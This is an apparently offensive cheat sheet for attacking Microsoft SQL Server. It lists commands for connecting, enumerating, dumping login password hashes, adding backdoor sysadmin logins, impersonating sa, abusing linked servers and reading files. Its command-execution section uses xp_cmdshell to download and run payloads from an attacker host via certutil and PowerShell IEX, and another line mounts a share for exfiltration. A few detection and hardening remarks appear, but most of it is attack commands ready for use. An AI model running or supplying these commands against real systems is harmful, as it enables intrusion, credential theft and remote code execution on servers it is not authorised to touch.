01
Auth & Linked Servers
$ impacket-mssqlclient <user>:<pass>@<ip> — Connect to MSSQL via Impacket (SQL authentication).
$ impacket-mssqlclient <domain>/<user>:<pass>@<ip> -windows-auth — Connect using Windows / domain authentication.
$ sqsh -S <ip> -U <user> -P <pass> — Connect with the sqsh client (alternative).
$ mssql-cli -S <ip> -U <user> -P <pass> — Connect via Microsoft's mssql-cli tool.
EXEC sp_linkedservers; — List all linked servers configured on this instance.
EXEC sp_addlinkedserver @server='<name>', @srvproduct='', @provider='SQLNCLI', @datasrc='<ip>'; — Add a new linked server (requires the ALTER ANY LINKED SERVER permission, held by sysadmin and setupadmin).
EXEC sp_addlinkedsrvlogin '<srv>','false',NULL,'<user>','<pass>'; — Map a local login to stored credentials for a linked server (these mappings are worth reviewing during hardening).
SELECT * FROM openquery([<linked_srv>], 'SELECT 1'); — Execute a query on a linked server via OPENQUERY.
02
Enumeration
SELECT @@version; — MSSQL version and build information.
SELECT @@servername; — Name of the current server instance.
SELECT SYSTEM_USER; — Currently logged-in SQL login.
SELECT USER_NAME(); — Current database user context.
SELECT name FROM sys.databases; — List all databases on the instance.
SELECT name FROM sys.server_logins; — List all server-level logins. Note: sys.server_logins is not a documented SQL Server catalog view; the documented views are sys.server_principals and sys.sql_logins.
SELECT name, is_sysadmin FROM sys.syslogins WHERE is_sysadmin=1; — List all sysadmin accounts. Note: in the sys.syslogins compatibility view the column is named sysadmin, not is_sysadmin.
SELECT name, type_desc FROM sys.server_principals; — All server principals (logins, roles, etc.).
SELECT IS_SRVROLEMEMBER('sysadmin'); — Check whether the current login is a sysadmin (1 = yes).
SELECT name, is_disabled FROM sys.server_principals WHERE type='S'; — List SQL logins and their disabled status.
EXEC sp_helpdb; — Show database metadata for all databases.
SELECT * FROM INFORMATION_SCHEMA.TABLES; — List tables and views in the current database.
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'; — List only base tables (no views).
SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='<tbl>'; — List columns and their types for a specific table.
SELECT * FROM <db>..<table>; — Query a table in another database without USE.
EXEC sp_configure; — Show server configuration options and their current values (advanced options are listed only when 'show advanced options' is set to 1).
03
Database Interaction
USE <database>; — Switch to a specific database.
SELECT * FROM <table>; — Dump all rows from a table.
SELECT TOP 10 * FROM <table>; — Retrieve the first 10 rows from a table.
SELECT * FROM <table> WHERE <col> LIKE '%<val>%'; — Search for a value within a column.
SELECT name, password_hash FROM sys.sql_logins; — Dump SQL login password hashes (the password_hash column is readable only with CONTROL SERVER, i.e. sysadmin; reads of this view are a high-value audit event).
CREATE LOGIN <user> WITH PASSWORD='<pass>'; — Create a new SQL login (requires ALTER ANY LOGIN).
EXEC sp_addsrvrolemember '<user>','sysadmin'; — Add a login to the sysadmin role. sp_addsrvrolemember is deprecated in favour of ALTER SERVER ROLE sysadmin ADD MEMBER; either form is captured by the SERVER_ROLE_MEMBER_CHANGE_GROUP audit action group.
ALTER LOGIN <user> WITH PASSWORD='<newpass>'; — Change a login's password.
04
Command Execution
EXEC sp_configure 'show advanced options',1; RECONFIGURE; — Enable advanced configuration options — required before xp_cmdshell can be enabled. Each option change is recorded in the SQL Server error log.
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; — Enable xp_cmdshell, which allows OS command execution. The change is recorded in the SQL Server error log as "Configuration option 'xp_cmdshell' changed from 0 to 1", which is a reliable detection hook.
EXEC xp_cmdshell 'whoami'; — Execute an OS command via xp_cmdshell (runs as the SQL Server service account for sysadmin callers, or as the configured proxy account otherwise).
EXEC xp_cmdshell 'powershell -enc <b64payload>'; — Execute a base64-encoded PowerShell payload.
EXEC xp_cmdshell 'certutil -urlcache -f http://<ip>/shell.exe C:\Windows\Temp\s.exe'; — Download a file from an attacker-controlled host via certutil.
EXEC xp_cmdshell 'C:\Windows\Temp\s.exe'; — Execute a dropped binary via xp_cmdshell.
EXEC xp_cmdshell 'powershell IEX(New-Object Net.WebClient).DownloadString("http://<ip>/shell.ps1")'; — In-memory PowerShell download and execute (no file written to disk).
DECLARE @cmd NVARCHAR(4000); SET @cmd='whoami'; EXEC xp_cmdshell @cmd; — Dynamic xp_cmdshell execution via a variable.
EXEC sp_execute_external_script @language=N'Python', @script=N'import os; os.system("whoami")'; — Execute Python if external scripts are enabled (the 'external scripts enabled' configuration option plus Machine Learning Services installed).
05
Privilege Escalation
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id=b.principal_id WHERE a.permission_name='IMPERSONATE'; — Find logins that can be impersonated.
EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; — Impersonate the sa login (requires the IMPERSONATE permission on it).
REVERT; — Revert to the original login after impersonation.
SELECT * FROM openquery([<srv>],"SELECT IS_SRVROLEMEMBER('sysadmin')"); — Check sysadmin role membership on a linked server (the double-quoted query string parses only when SET QUOTED_IDENTIFIER is OFF).
EXEC('EXEC xp_cmdshell ''whoami''') AT [<linked_srv>]; — Execute xp_cmdshell on a linked server via the AT keyword (requires the linked server's rpc out option; links with rpc out enabled are a lateral-movement path worth flagging in a hardening review).
SELECT * FROM openquery([<srv>],"EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"); — Enable xp_cmdshell on a linked server via OPENQUERY (OPENQUERY expects a result set, so this form may fail depending on the provider; the same QUOTED_IDENTIFIER caveat as above applies).
06
File Access
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt'; — Read a file via xp_cmdshell and the type command.
EXEC xp_cmdshell 'dir C:\Users\'; — List directory contents via xp_cmdshell.
BULK INSERT tempdb..tmp FROM 'C:\Windows\win.ini' WITH (ROWTERMINATOR='\n'); — Read a local file into a table using BULK INSERT (the target table tempdb..tmp must already exist; requires ADMINISTER BULK OPERATIONS / bulkadmin).
EXEC xp_fileexist 'C:\Windows\System32\cmd.exe'; — Check whether a file exists on the server (File Exists column: 1 = exists).
EXEC xp_cmdshell 'net use Z: \\<ip>\share <pass> /user:<domain>\<user>'; — Mount a network share for file transfer / exfiltration (outbound SMB from a database host is a detection opportunity).